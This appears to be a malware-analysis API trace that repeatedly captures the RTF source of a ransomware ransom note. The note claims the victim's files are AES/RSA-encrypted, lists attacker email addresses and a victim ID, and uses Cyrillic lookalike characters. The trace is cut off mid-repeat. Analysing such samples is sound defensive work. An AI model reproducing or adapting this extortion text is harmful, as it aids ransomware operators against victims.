ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.445] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.445] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 